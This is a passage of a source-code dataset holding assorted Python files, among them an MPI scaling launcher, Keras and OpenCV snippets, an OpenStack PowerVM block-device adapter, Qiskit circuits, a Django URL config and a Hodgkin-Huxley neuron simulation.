\"./\"+os.path.dirname(sys.argv[0])\nif (sys.platform == \"win32\"):\n\tFOLDER=\"/Release/\"\n\tMPI=\"mpiexec\"\nelse: \n\tFOLDER=\"\"\n\tMPI=\"$I_MPI_ROOT/intel64/bin/mpiexec\"\n\n\nNAME_PAR_PROGRAM = \"\\\"\"+DIR_SCRIPT+\"/../../../../build/src/examples/running_wave/running_wave_parallel/\"+FOLDER+\"/running_wave_parallel\"+\"\\\"\"\n\n#HOSTS=[\"node10\",\"node13\",\"node14\",\"node15\",\"node18\",\"node101\",\"node21\",\"node22\",\"node23\",\"node26\",\"node27\",\"node28\",\"node29\",\"node30\",\"node32\",\"node34\"]\nHOSTS=[\"node104\",\"node105\",\"node106\",\"node107\"]\n\nLIGHT_SPEED = 29979245800\n\nNX = 2048\nNY = 1\nNZ = 2048\n\nD = 1\n\nDT = D/LIGHT_SPEED\n\nSOLVER = \"PSATD\"\n\nLAMBD = 64 * D\nANGLE = 0\n\n#NUM_NODES=[2, 4, 8, 16]\nNUM_NODES=[2, 4]\n\nNUM_ITER=1024\nNUM_ITER_IN_DOMAIN = 12 # k in article\n\nN_THREADS = 16\n\nGUARD = 32\n\nREPEAT = 3\n\nprint(\"MPI_VERSION_STRONG_SCALABILITY\")\n\nfor N_NODES in NUM_NODES:\n\t\n\tdeg_num_nodes = int(math.log(N_NODES)/math.log(2))\n\tnpx=2**int(deg_num_nodes/2)\n\tnpz=int(N_NODES/npx)\n\tprint(str(npx)+\"x\"+str(npz))\n\t\n\thosts=HOSTS[0]\n\tfor i in range(1,N_NODES):\n\t\thosts+=\",\"+HOSTS[i]\n\t\n\tcommand_args_par = \"-ax \"+str(0)+\" \"+\\\n\t\t\t\t\t\t\"-ay \"+str(0)+\" \"+\\\n\t\t\t\t\t\t\"-az \"+str(0)+\" \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-dx \"+str(D)+\" \"+\\\n\t\t\t\t\t\t\"-dy \"+str(D)+\" \"+\\\n\t\t\t\t\t\t\"-dz \"+str(D)+\" \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-nx \"+str(NX)+\" \"+\\\n\t\t\t\t\t\t\"-ny \"+str(NY)+\" \"+\\\n\t\t\t\t\t\t\"-nz \"+str(NZ)+\" \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-dt \"+str(DT)+\" \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-solver \"+str(SOLVER)+\" \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-npx \"+str(npx)+\" \"+\\\n\t\t\t\t\t\t\"-npy \"+str(1)+\" \"+\\\n\t\t\t\t\t\t\"-npz \"+str(npz)+\" \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-gx \"+str(GUARD)+\" \"+\\\n\t\t\t\t\t\t\"-gy \"+str(0)+\" \"+\\\n\t\t\t\t\t\t\"-gz \"+str(GUARD)+\" \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-nseqi \"+str(0)+\" \"+\\\n\t\t\t\t\t\t\"-npari \"+str(NUM_ITER)+\" \"+\\\n\t\t\t\t\t\t\"-ndomi \"+str(NUM_ITER_IN_DOMAIN)+\" \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-mask simple \"+\\\n\t\t\t\t\t\t\"-filter off \"+\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-dim \"+str(1)+\" \"\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-dump off \"\\\n\t\t\t\t\t\t\"-dir \"+str(DIR_SCRIPT)+\" \"\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-nthreads \"+str(N_THREADS)+\" \"\\\n\t\t\t\t\t\t\\\n\t\t\t\t\t\t\"-lambda \"+str(LAMBD)+\" \"+\\\n\t\t\t\t\t\t\"-angle \"+str(ANGLE)+\" \";\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\n\tfor rep in range(REPEAT):\n\t\tprocess_seq = subprocess.Popen(MPI+\" -np \"+str(N_NODES)+\" -ppn 1 -hosts \"+hosts+\" \"+NAME_PAR_PROGRAM+\" \"+command_args_par, shell=True)\n\t\tprocess_seq.wait()\n\t\t","sub_path":"scripts/running_wave/run/time_test/test_MPI_strong_scalability.py","file_name":"test_MPI_strong_scalability.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"292979388","text":"import keras\nimport keras.backend as K\n\nfrom keras.layers import Layer\nfrom keras import initializers\n\n\nclass PositionEmbedding(Layer):\n def __init__(\n self,\n input_dim,\n output_dim,\n embeddings_initializer=keras.initializers.Zeros(),\n **kwargs\n ):\n super(PositionEmbedding, self).__init__(**kwargs)\n self.input_dim = input_dim\n self.output_dim = output_dim\n self.embeddings_initializer = embeddings_initializer\n\n def build(self, input_shape):\n super(PositionEmbedding, self).build(input_shape)\n self.embeddings = self.add_weight(\n name='position_embeddings',\n shape=(self.input_dim, self.output_dim),\n initializer=self.embeddings_initializer)\n\n def call(self, inputs, **kwargs):\n input_shape = K.shape(inputs)\n batch_size, seq_len = input_shape[0], input_shape[1]\n pos_embeddings = self.embeddings[:seq_len]\n pos_embeddings = K.expand_dims(pos_embeddings, 0)\n return inputs + pos_embeddings\n\n def compute_mask(self, inputs, mask=None):\n return mask\n\n def get_config(self):\n config = {\n 'input_dim': self.input_dim,\n 'output_dim': self.output_dim,\n 'embeddings_initializer': initializers.serialize(self.embeddings_initializer)\n }\n base_config = super(PositionEmbedding, self).get_config()\n return dict(list(config.items()) + list(base_config.items()))\n","sub_path":"layers/PositionEmbedding.py","file_name":"PositionEmbedding.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"318460976","text":"\"\"\"\nCollection of Numpy random functions, wrapped to fit Ivy syntax and signature.\n\"\"\"\n\n# global\nimport numpy as _np\n\nrandom_uniform = lambda low, high, size, _=None: _np.random.uniform(low, high, size)\nrandint = lambda low, high, size, _=None: _np.random.randint(low, high, size)\nseed = lambda seed_value: _np.random.seed(seed_value)\n\n\ndef shuffle(x):\n _np.random.shuffle(x)\n return x\n","sub_path":"ivy/numpy/core/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"183461866","text":"import numpy as np\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\nimg = cv.imread('box.png', cv.IMREAD_GRAYSCALE)\nassert img is not None, \"file could not be read, check with os.path.exists()\"\n# Output dtype = cv.CV_8U\nsobelx8u = cv.Sobel(img,cv.CV_8U,1,0,ksize=5)\n# Output dtype = cv.CV_64F. Then take its absolute and convert to cv.CV_8U\nsobelx64f = cv.Sobel(img,cv.CV_64F,1,0,ksize=5)\nabs_sobel64f = np.absolute(sobelx64f)\nsobel_8u = np.uint8(abs_sobel64f)\nplt.subplot(1,3,1),plt.imshow(img,cmap = 'gray')\nplt.title('Original'), plt.xticks([]), plt.yticks([])\nplt.subplot(1,3,2),plt.imshow(sobelx8u,cmap = 'gray')\nplt.title('Sobel CV_8U'), plt.xticks([]), plt.yticks([])\nplt.subplot(1,3,3),plt.imshow(sobel_8u,cmap = 'gray')\nplt.title('Sobel abs(CV_64F)'), plt.xticks([]), plt.yticks([])\nplt.show()\n","sub_path":"openCV/openCV.py/image_processing/13.image_gradients_02.py","file_name":"13.image_gradients_02.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"282930458","text":"class Solution:\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n\n def helper(board, i, j, word):\n if len(word) == 0:\n return True\n\n if (len(board) == 0 or\n i < 0 or i >= len(board) or\n j < 0 or j >= len(board[0]) or\n board[i][j] != word[0]):\n return False\n\n board[i][j] = '#' # prevent backtrack\n if (helper(board, i+1, j, word[1:])\n or helper(board, i, j + 1, word[1:])\n or helper(board, i-1, j, word[1:])\n or helper(board, i, j-1, word[1:])\n ):\n return True\n board[i][j] = word[0]\n return False\n\n m = len(board)\n if m == 0:\n return False\n n = len(board[0])\n\n for i in range(m):\n for j in range(n):\n if helper(board, i, j, word):\n return True\n return False\n","sub_path":"79.word-search.python3.py","file_name":"79.word-search.python3.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"210142002","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2012 IBM\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport hashlib\nimport os\nimport re\n\nfrom nova import utils\n\nfrom nova.openstack.common import cfg\nfrom nova.openstack.common import excutils\nfrom nova.openstack.common import log as logging\nfrom nova.virt import images\nfrom nova.virt.powervm import command\nfrom nova.virt.powervm import common\nfrom nova.virt.powervm import constants\nfrom nova.virt.powervm import exception\n\nLOG = logging.getLogger(__name__)\nCONF = cfg.CONF\n\n\nclass PowerVMDiskAdapter(object):\n pass\n\n\nclass PowerVMLocalVolumeAdapter(PowerVMDiskAdapter):\n \"\"\"Default block device providor for PowerVM\n\n This disk adapter uses logical volumes on the hosting VIOS\n to provide backing block devices for instances/LPARs\n \"\"\"\n\n def __init__(self, connection):\n super(PowerVMLocalVolumeAdapter, self).__init__()\n\n self.command = command.IVMCommand()\n\n self._connection = None\n self.connection_data = connection\n\n def _set_connection(self):\n if self._connection is None:\n self._connection = common.ssh_connect(self.connection_data)\n\n def create_volume(self, size):\n \"\"\"Creates a logical volume with a minimum size\n\n :param size: size of the logical volume in bytes\n :returns: string -- the name of the new logical volume.\n :raises: PowerVMNoSpaceLeftOnVolumeGroup\n \"\"\"\n return self._create_logical_volume(size)\n\n def delete_volume(self, disk_name):\n \"\"\"Removes the Logical Volume and its associated vSCSI connection\n\n :param disk_name: name of Logical Volume device in /dev/\n \"\"\"\n LOG.debug(_(\"Removing the logical volume '%s'\") % disk_name)\n self._remove_logical_volume(disk_name)\n\n def create_volume_from_image(self, context, instance, image_id):\n \"\"\"Creates a Logical Volume and copies the specified image to it\n\n :param context: nova context used to retrieve image from glance\n :param instance: instance to create the volume for\n :image_id: image_id reference used to locate image in glance\n :returns: dictionary with the name of the created\n Logical Volume device in 'device_name' key\n \"\"\"\n\n file_name = '.'.join([image_id, 'gz'])\n file_path = os.path.join(CONF.powervm_img_local_path,\n file_name)\n\n if not os.path.isfile(file_path):\n LOG.debug(_(\"Fetching image '%s' from glance\") % image_id)\n images.fetch_to_raw(context, image_id, file_path,\n instance['user_id'],\n project_id=instance['project_id'])\n else:\n LOG.debug((_(\"Using image found at '%s'\") % file_path))\n\n LOG.debug(_(\"Ensuring image '%s' exists on IVM\") % file_path)\n remote_path = CONF.powervm_img_remote_path\n remote_file_name, size = self._copy_image_file(file_path, remote_path)\n\n # calculate root device size in bytes\n # we respect the minimum root device size in constants\n size_gb = max(instance['instance_type']['root_gb'],\n constants.POWERVM_MIN_ROOT_GB)\n size = size_gb * 1024 * 1024 * 1024\n\n try:\n LOG.debug(_(\"Creating logical volume of size %s bytes\") % size)\n disk_name = self._create_logical_volume(size)\n\n LOG.debug(_(\"Copying image to the device '%s'\") % disk_name)\n self._copy_file_to_device(remote_file_name, disk_name)\n except Exception:\n LOG.error(_(\"Error while creating logical volume from image. \"\n \"Will attempt cleanup.\"))\n # attempt cleanup of logical volume before re-raising exception\n with excutils.save_and_reraise_exception():\n try:\n self.delete_volume(disk_name)\n except Exception:\n msg = _('Error while attempting cleanup of failed '\n 'deploy to logical volume.')\n LOG.exception(msg)\n\n return {'device_name': disk_name}\n\n def create_image_from_volume(self):\n raise NotImplementedError()\n\n def migrate_volume(self):\n raise NotImplementedError()\n\n def attach_volume_to_host(self, *args, **kargs):\n pass\n\n def detach_volume_from_host(self, *args, **kargs):\n pass\n\n def _create_logical_volume(self, size):\n \"\"\"Creates a logical volume with a minimum size.\n\n :param size: size of the logical volume in bytes\n :returns: string -- the name of the new logical volume.\n :raises: PowerVMNoSpaceLeftOnVolumeGroup\n \"\"\"\n vgs = self.run_vios_command(self.command.lsvg())\n cmd = self.command.lsvg('%s -field vgname freepps -fmt :' %\n ' '.join(vgs))\n output = self.run_vios_command(cmd)\n found_vg = None\n\n # If it's not a multiple of 1MB we get the next\n # multiple and use it as the megabyte_size.\n megabyte = 1024 * 1024\n if (size % megabyte) != 0:\n megabyte_size = int(size / megabyte) + 1\n else:\n megabyte_size = size / megabyte\n\n # Search for a volume group with enough free space for\n # the new logical volume.\n for vg in output:\n # Returned output example: 'rootvg:396 (25344 megabytes)'\n match = re.search(r'^(\\w+):\\d+\\s\\((\\d+).+$', vg)\n if match is None:\n continue\n vg_name, avail_size = match.groups()\n if megabyte_size <= int(avail_size):\n found_vg = vg_name\n break\n\n if not found_vg:\n LOG.error(_('Could not create logical volume. '\n 'No space left on any volume group.'))\n raise exception.PowerVMNoSpaceLeftOnVolumeGroup()\n\n cmd = self.command.mklv('%s %sB' % (found_vg, size / 512))\n lv_name = self.run_vios_command(cmd)[0]\n return lv_name\n\n def _remove_logical_volume(self, lv_name):\n \"\"\"Removes the lv and the connection between its associated vscsi.\n\n :param lv_name: a logical volume name\n \"\"\"\n cmd = self.command.rmvdev('-vdev %s -rmlv' % lv_name)\n self.run_vios_command(cmd)\n\n def _copy_file_to_device(self, source_path, device, decompress=True):\n \"\"\"Copy file to device.\n\n :param source_path: path to input source file\n :param device: output device name\n :param decompress: if True (default) the file will be decompressed\n on the fly while being copied to the drive\n \"\"\"\n if decompress:\n cmd = ('gunzip -c %s | dd of=/dev/%s bs=1024k' %\n (source_path, device))\n else:\n cmd = 'dd if=%s of=/dev/%s bs=1024k' % (source_path, device)\n self.run_vios_command_as_root(cmd)\n\n def _copy_image_file(self, source_path, remote_path, decompress=False):\n \"\"\"Copy file to VIOS, decompress it, and return its new size and name.\n\n :param source_path: source file path\n :param remote_path remote file path\n :param decompress: if True, decompressess the file after copying;\n if False (default), just copies the file\n \"\"\"\n # Calculate source image checksum\n hasher = hashlib.md5()\n block_size = 0x10000\n img_file = file(source_path, 'r')\n buf = img_file.read(block_size)\n while len(buf) > 0:\n hasher.update(buf)\n buf = img_file.read(block_size)\n source_cksum = hasher.hexdigest()\n\n comp_path = os.path.join(remote_path, os.path.basename(source_path))\n uncomp_path = comp_path.rstrip(\".gz\")\n if not decompress:\n final_path = comp_path\n else:\n final_path = \"%s.%s\" % (uncomp_path, source_cksum)\n\n # Check whether the image is already on IVM\n output = self.run_vios_command(\"ls %s\" % final_path,\n check_exit_code=False)\n\n # If the image does not exist already\n if not len(output):\n # Copy file to IVM\n common.ftp_put_command(self.connection_data, source_path,\n remote_path)\n\n # Verify image file checksums match\n cmd = (\"/usr/bin/csum -h MD5 %s |\"\n \"/usr/bin/awk '{print $1}'\" % comp_path)\n output = self.run_vios_command_as_root(cmd)\n if not len(output):\n LOG.error(_(\"Unable to get checksum\"))\n raise exception.PowerVMFileTransferFailed()\n if source_cksum != output[0]:\n LOG.error(_(\"Image checksums do not match\"))\n raise exception.PowerVMFileTransferFailed()\n\n if decompress:\n # Unzip the image\n cmd = \"/usr/bin/gunzip %s\" % comp_path\n output = self.run_vios_command_as_root(cmd)\n\n # Remove existing image file\n cmd = \"/usr/bin/rm -f %s.*\" % uncomp_path\n output = self.run_vios_command_as_root(cmd)\n\n # Rename unzipped image\n cmd = \"/usr/bin/mv %s %s\" % (uncomp_path, final_path)\n output = self.run_vios_command_as_root(cmd)\n\n # Remove compressed image file\n cmd = \"/usr/bin/rm -f %s\" % comp_path\n output = self.run_vios_command_as_root(cmd)\n\n else:\n LOG.debug(_(\"Image found on host at '%s'\") % final_path)\n\n # Calculate file size in multiples of 512 bytes\n output = self.run_vios_command(\"ls -o %s|awk '{print $4}'\" %\n final_path, check_exit_code=False)\n if len(output):\n size = int(output[0])\n else:\n LOG.error(_(\"Uncompressed image file not found\"))\n raise exception.PowerVMFileTransferFailed()\n if (size % 512 != 0):\n size = (int(size / 512) + 1) * 512\n\n return final_path, size\n\n def run_vios_command(self, cmd, check_exit_code=True):\n \"\"\"Run a remote command using an active ssh connection.\n\n :param command: String with the command to run.\n \"\"\"\n self._set_connection()\n stdout, stderr = utils.ssh_execute(self._connection, cmd,\n check_exit_code=check_exit_code)\n return stdout.strip().splitlines()\n\n def run_vios_command_as_root(self, command, check_exit_code=True):\n \"\"\"Run a remote command as root using an active ssh connection.\n\n :param command: List of commands.\n \"\"\"\n self._set_connection()\n stdout, stderr = common.ssh_command_as_root(\n self._connection, command, check_exit_code=check_exit_code)\n return stdout.read().splitlines()\n","sub_path":"nova/virt/powervm/blockdev.py","file_name":"blockdev.py","file_ext":"py","file_size_in_byte":11471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"220437523","text":"def FibonacciNumbers(range):\n fibList = [1,2,3]\n newList = []\n\n while fibList[-1] < range:\n for number in fibList:\n newList.append(number + (fibList[fibList.index(number) - 1]))\n print(newList)\n\nFibonacciNumbers(10)\n\n\n#return index of list [\"foo\",\"bar\",\"baz\"].index(\"bar\") = 1","sub_path":"EvenFibonacciNumbers.py","file_name":"EvenFibonacciNumbers.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"187471376","text":"import numpy as np\n\n\ndef get_gaussian_filter_slow(extend, sigma, dimension):\n \"\"\"\n Get a gaussian filter with length of 2 * extend + 1 along each dimension\n :param extend:\n :param sigma:\n :param dimension: Specify whether it's 2D or 3D\n :return:\n \"\"\"\n\n if dimension == 2:\n\n holder = np.zeros((2 * extend + 1, 2 * extend + 1), dtype=np.float64)\n for l in range(-extend, extend + 1):\n for m in range(-extend, extend + 1):\n holder[l, m] = np.exp(-(l ** 2 + m ** 2) / (2 * sigma ** 2))\n\n # Normalize the filter\n holder /= np.sum(holder)\n\n elif dimension == 3:\n holder = np.zeros((2 * extend + 1,\n 2 * extend + 1,\n 2 * extend + 1), dtype=np.float64)\n for l in range(-extend, extend + 1):\n for m in range(-extend, extend + 1):\n for n in range(-extend, extend + 1):\n holder[l, m] = np.exp(-(l ** 2 + m ** 2) / (2 * sigma ** 2))\n\n # Normalize the filter\n holder /= np.sum(holder)\n\n else:\n raise Exception(\"dimension has to be integer 2 or 3.\")\n\n return holder\n\n\ndef get_gaussian_filter(extend, sigma, dimension):\n \"\"\"\n Get a gaussian filter quickly.\n\n :param extend:\n :param sigma:\n :param dimension:\n :return:\n \"\"\"\n coor = np.meshgrid(*tuple((np.arange(-extend,\n extend + 1,\n dtype=np.float64),) * dimension))\n\n holder = np.square(coor[0])\n for l in range(1, dimension):\n holder += np.square(coor[l])\n\n # Scale according to the sigma\n holder /= -(sigma ** 2)\n\n # Apply the exp function\n np.exp(holder, out=holder)\n\n return holder\n","sub_path":"outdate/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"442386014","text":"from qiskit import QuantumProgram\r\n#from qiskit.tools.visualization import plot_histogram\r\n#from qasm2image import qasm2png\r\n\r\nclass Quantum_culc:\r\n qp = QuantumProgram()\r\n qr = qp.create_quantum_register(\"qr\", 3)\r\n cr = qp.create_classical_register(\"cr\", 3)\r\n\r\n @classmethod\r\n def A_circuit(self):\r\n qp = self.qp\r\n qr = self.qr\r\n cr = self.cr\r\n qc = self.qp.create_circuit(\"A_circuit\", [qr], [cr])\r\n qc.cx(qr[0], qr[2])\r\n qc.measure(qr[0], cr[0])\r\n qc.measure(qr[1], cr[1])\r\n qc.measure(qr[2], cr[2])\r\n result_A = qp.execute(\"A_circuit\")\r\n print(result_A.get_counts(\"A_circuit\"))\r\n #print(qc.qasm())\r\n #print(qasm2png(qc.qasm()))\r\n\r\n @classmethod\r\n def B_circuit(self):\r\n qp = self.qp\r\n qr = self.qr\r\n cr = self.cr\r\n qc = self.qp.create_circuit(\"B_circuit\", [qr], [cr])\r\n qc.cx(qr[1], qr[0])\r\n qc.cx(qr[0], qr[1])\r\n qc.cx(qr[1], qr[2])\r\n qc.cx(qr[0], qr[1])\r\n qc.cx(qr[1], qr[0])\r\n qc.measure(qr[0], cr[0])\r\n qc.measure(qr[1], cr[1])\r\n qc.measure(qr[2], cr[2])\r\n result_B = qp.execute(\"B_circuit\")\r\n print(result_B.get_counts(\"B_circuit\"))\r\n\r\n\r\n @classmethod\r\n def C_circuit(self):\r\n qp = self.qp\r\n qr = self.qr\r\n cr = self.cr\r\n qc = self.qp.create_circuit(\"C_circuit\", [qr], [cr])\r\n qc.cx(qr[0], qr[1])\r\n qc.cx(qr[1], qr[2])\r\n qc.cx(qr[0], qr[1])\r\n qc.cx(qr[1], qr[2])\r\n qc.measure(qr[0], cr[0])\r\n qc.measure(qr[1], cr[1])\r\n qc.measure(qr[2], cr[2])\r\n result_C = qp.execute(\"C_circuit\")\r\n print(result_C.get_counts(\"C_circuit\"))\r\n\r\n @classmethod\r\n def D_circuit(self):\r\n qp = self.qp\r\n qr = self.qr\r\n cr = self.cr\r\n qc = self.qp.create_circuit(\"D_circuit\", [qr], [cr])\r\n qc.h(qr[0])\r\n qc.h(qr[2])\r\n qc.cx(qr[1], qr[2])\r\n qc.cx(qr[2], qr[1])\r\n qc.cx(qr[2], qr[1])\r\n qc.cx(qr[1], qr[2])\r\n qc.h(qr[0])\r\n qc.h(qr[2])\r\n qc.measure(qr[0], cr[0])\r\n qc.measure(qr[1], cr[1])\r\n qc.measure(qr[2], cr[2])\r\n result_D = qp.execute(\"D_circuit\")\r\n print(result_D.get_counts(\"D_circuit\"))\r\n\r\n\r\nif __name__ == '__main__':\r\n Quantum_culc.A_circuit()\r\n Quantum_culc.B_circuit()\r\n Quantum_culc.C_circuit()\r\n Quantum_culc.D_circuit()\r\n","sub_path":"four_gates.py","file_name":"four_gates.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"104228225","text":"from random import *\n\ndef leseDatei():\n datei = open('questions.txt', 'r')\n text = datei.read()\n datei.close()\n return text\n\ndef frageStellen(combined):\n processed=[]\n processed=combined.split(\"!\")\n print(processed[0])\n print(processed[1],processed[2],processed[3],processed[4])\n if processed[5]==input():\n return True\n else:\n return False\n\n\ndef quizStarten():\n print(\"Welche Spieler sollen mit spielen?\")\n spieler = []\n questions=[]\n verloren=False\n eingabe = \" \"\n beantwortet=False\n while not eingabe==\"\":\n eingabe = input()\n if not eingabe==\"\":\n spieler.append(eingabe)\n spielerCounter=0\n spielerKonto = [500 for i in range(len(spieler))]\n questions=leseDatei().splitlines()\n\n #loops the questions\n while verloren==False:\n #checks if spieler counter greater than number of players\n if spielerCounter.+)/$', 'views.rss', name ='rss-feed'),\n (r'^ajax/', include(ajax_urlpatterns)),\n (r'^export/$', 'backup_views.export_urls'),\n (r'^import/$', 'backup_views.import_urls'),\n )","sub_path":"catalog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"562480318","text":"import numpy as np\nimport pylab as plt\n\n\n##############################################################################################\ndef set_parameters():\n '''\n Defines simulation, stimulus and neuron parameters and stores values in parameter dictionary p.\n\n Returns:\n --------\n p : dict\n Parameter dictionary.\n \n '''\n\n ## initialise new dictionary\n p = {}\n\n ## simulation parameters\n p['T'] = 50. ## simulation time (ms)\n p['dt'] = 0.025 ## simulation time resolution (ms)\n\n ## stimulus parameters\n p['I_amp'] = 10. ## input current amplitude (uA/cm2)\n p['t_stim_on'] = 5. ## stimulus-on time (ms)\n p['t_stim_off'] = 30. ## stimulus-off time (ms)\n\n ## neuron parameters\n p['V_rest'] = -65. ## resting potential (mV)\n p['Cm'] = 1. ## membrane capacitance (uF/cm2)\n p['gbar_Na'] = 120. ## max. Na conductance (mS/cm2)\n p['gbar_K'] = 36. ## max K conductance (mS/cm2)\n p['gbar_l'] = 0.3 ## leak conductance (mS/cm2)\n p['E_Na'] = 50. ## Na reversal potentail (mV)\n p['E_K'] = -77. ## K reversal potentail (mV)\n p['E_l'] = -54.387 ## Leak reversal potentail (mV)\n\n ## voltage dependence of gate variables \n ### K activation\n p['alpha_n'] = np.vectorize(\n lambda v: 0.01 * (v + 55.) / (1. - np.exp(-(v + 55.) / 10.)) if v != -55. else 0.1\n ) ## activation rate (1/ms)\n p['beta_n'] = lambda v: 0.125 * np.exp(-(v + 65.) / 80.) ## inactivation rate (1/ms)\n\n ### Na activation\n p['alpha_m'] = np.vectorize(\n lambda v: 0.1 * (v + 40.) / (1. - np.exp(-(v + 40.) / 10.)) if v != -40. else 1\n ) ## activation rate (1/ms)\n p['beta_m'] = lambda v: 4. * np.exp(-(v + 65.) / 18.) ## inactivation rate (1/ms)\n\n ### Na inactivation\n p['alpha_h'] = lambda v: 0.07 * np.exp(-(v + 65.) / 20.) ## activation rate (1/ms)\n p['beta_h'] = lambda v: 1. / (1. + np.exp(-(v + 35.) / 10.)) ## inactivation rate (1/ms)\n\n derived_parameters(p) ## add derived parameters to dictionary (see below)\n\n ## HINT: Storing parameters in dictionaries simplifies function definitions by reducing number of arguments (see below).\n return p\n\n\n##############################################################################################\ndef derived_parameters(p):\n '''\n Set derived parameters, i.e. parameters which are fully defined by parameters in p.\n\n Parameters:\n -----------\n p: dict\n Parameter dictionary\n \n Returns:\n --------\n nothing (p is modified \"on-the-fly\").\n \n '''\n\n p['time'] = np.arange(0, p['T'] + p['dt'], p['dt']) ## time array (ms)\n p['n_inf'] = lambda v: p['alpha_n'](v) / (p['alpha_n'](v) + p['beta_n'](v)) ## steady-state K activation\n p['tau_n'] = lambda v: 1. / (p['alpha_n'](v) + p['beta_n'](v)) ## (ms)\n p['m_inf'] = lambda v: p['alpha_m'](v) / (p['alpha_m'](v) + p['beta_m'](v)) ## steady-state Na activation\n p['tau_m'] = lambda v: 1. / (p['alpha_m'](v) + p['beta_m'](v)) ## (ms)\n p['h_inf'] = lambda v: p['alpha_h'](v) / (p['alpha_h'](v) + p['beta_h'](v)) ## steady-state Na inactivation\n p['tau_h'] = lambda v: 1. / (p['alpha_h'](v) + p['beta_h'](v)) ## (ms)\n\n\n##############################################################################################\ndef stimulus(p):\n '''\n Consctructs array I of input currents with\n\n I(t) = p['I_amp'] for p['t_stim_on'] <= t <= p['t_stim_off']\n I(t) = 0.0 else.\n\n (i.e. current pulse of length p['t_stim_off']-p['t_stim_on']).\n \n Parameters:\n -----------\n p: dict\n Parameter dictionary\n \n Returns:\n --------\n I: ndarray\n Array of input currents with with len(I) = len(p['time']).\n\n '''\n\n I = np.zeros(len(p['time']))\n N = len(p['time'])\n n = 0\n while (n < N):\n t = n * p['dt']\n if t > p['t_stim_on'] and t < p['t_stim_off']:\n I[n] = p['I_amp']\n else:\n I[n] = 0\n\n n += 1\n\n return I\n\n\n##############################################################################################\ndef update(Vm, m, h, n, I, p):\n '''\n Updates neuron state (Vm,m,h,n) from time step i-1 to time step i.\n\n Parameters:\n -----------\n Vm: float\n Membrane potentential at time step i-1.\n m: float\n Na activation at time step i-1.\n h: float\n Na inactivation at time step i-1.\n n: float\n K activation at time step i-1.\n I: float\n Input current at time step i-1.\n p: dict\n Parameter dictionary\n \n Returns:\n --------\n Vm: float\n Membrane potentential at time step i.\n m: float\n Na activation at time step i.\n h: float\n Na inactivation at time step i. \n n: float\n K activation at time step i.\n '''\n\n Vm = Vm + p['dt']/p['Cm']*(\\\n I \\\n - p['gbar_K'] *n**4* (Vm - p['E_K']) \\\n - p['gbar_Na']*m**3*h*(Vm - p['E_Na']) \\\n - p['gbar_l'] * (Vm - p['E_l']) \\\n )\n m = m + p['dt'] * (p['m_inf'](Vm) - m) / p['tau_m'](Vm)\n h = h + p['dt'] * (p['h_inf'](Vm) - h) / p['tau_h'](Vm)\n n = n + p['dt'] * (p['n_inf'](Vm) - n) / p['tau_n'](Vm)\n return Vm, m, h, n\n\n\n##############################################################################################\ndef simulate(p):\n '''\n 1) Initialises state variables Vm, m, h, n with respective values at resting potential p['V_rest'].\n 2) Constructs and returns array I of input currents by calling stimulus().\n 3) Constructs array Vm of membrane potentials by calling update() in each time step.\n\n Parameters:\n -----------\n p: dict\n Parameter dictionary\n \n Returns:\n --------\n Vm: ndarray\n Array of membrane potentials with len(Vm) = len(p['time']).\n I: ndarray\n Array of input currents with len(I) = len(p['time']).\n\n '''\n\n Vm = np.zeros(len(p['time']))\n m = np.zeros(len(p['time']))\n h = np.zeros(len(p['time']))\n n = np.zeros(len(p['time']))\n\n Vm[0] = p['V_rest']\n m[0] = p['m_inf'](Vm[0])\n n[0] = p['n_inf'](Vm[0])\n h[0] = p['h_inf'](Vm[0])\n\n I = stimulus(p)\n\n spikes = 0\n sIndex = -1\n N = len(p['time'])\n i = 0\n while (i < N - 1):\n Vm[i+1], m[i+1], h[i+1] , n[i+1] \\\n = update(Vm[i], m[i], 